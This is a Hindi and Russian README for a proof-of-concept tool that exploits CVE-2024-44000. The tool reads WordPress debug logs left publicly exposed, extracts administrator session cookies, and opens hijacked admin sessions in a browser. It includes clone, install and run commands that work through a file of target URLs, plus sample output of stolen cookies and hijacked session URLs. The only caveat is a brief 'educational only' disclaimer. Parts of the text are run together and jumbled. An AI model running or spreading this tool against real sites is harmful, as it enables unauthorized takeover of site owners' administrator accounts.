
एक PoC उपकरण है जो असुरक्षित रूप से उजागर डीबग लॉग्स का शोषण करने और वर्डप्रेस साइट्स से सेशन कुकीज़ निकालने के लिए डिज़ाइन किया गया है
GenCookieSessionHijack एक PoC उपकरण है जिसे WordPress साइटों से असुरक्षित रूप से उजागर डीबग लॉग का शोषण करने और सत्र कुकीज़ निकालने के लिए डिज़ाइन किया गया है। यह हमलावर को सक्रिय व्यवस्थापक सत्रों को हाईजैक करने और WordPress एडमिन डैशबोर्ड तक अनधिकृत पहुंच प्राप्त करने की अनुमति देता है।
wordpress_logged_in) की पहचान करें और फ़िल्टर करें।git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
list.txt)।python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file: URL की सूची वाली फ़ाइल का पथ (डिफ़ॉल्ट: list.txt)।-o, --output: परिणाम सहेजने के लिए फ़ाइल (डिफ़ॉल्ट: result.txt)।python GenCookieSessionHijack.py -f targets.txt -o output.txt
यह targets.txt से URL की सूची पढ़ेगा, सत्र कुकीज़ निकालने और उपयोग करने का प्रयास करेगा, और परिणाम output.txt में सहेजेगा।
यदि सत्र हाईजैकिंग का प्रयास सफल होता है, तो उपकरण हाईजैक किए गए व्यवस्थापक सत्र कुकी के साथ एक URL उत्पन्न करेगा और इसे सीधे डिफ़ॉल्ट ब्राउज़र में खोलेगा।
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग अवैध गतिविधियों के लिए नहीं किया जाना चाहिए। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
GenCookieSessionHijack — это PoC скрипт, созданный для эксплуатации уязвимо раскрытых отладочных логов на сайтах WordPress с целью извлечения сессионных cookies. Это позволяет злоумышленнику перехватить активные сеансы администратора и получить несанкционированный доступ к панели администрирования WordPress.
wordpress_logged_in).git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
list.txt).python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file: Путь к файлу со списком URL (по умолчанию: list.txt).-o, --output: Файл для сохранения результатов (по умолчанию: result.txt).python GenCookieSessionHijack.py -f targets.txt -o output.txt
Это прочитает список URL из targets.txt, попытается извлечь и использовать сессионные cookies, и сохранит результаты в output.txt.
Если попытка захвата сеанса успешна, инструмент сгенерирует URL с захваченным сессионным cookie администратора и откроет его непосредственно в браузере.
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться для незаконных действий. Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный этим инструментом.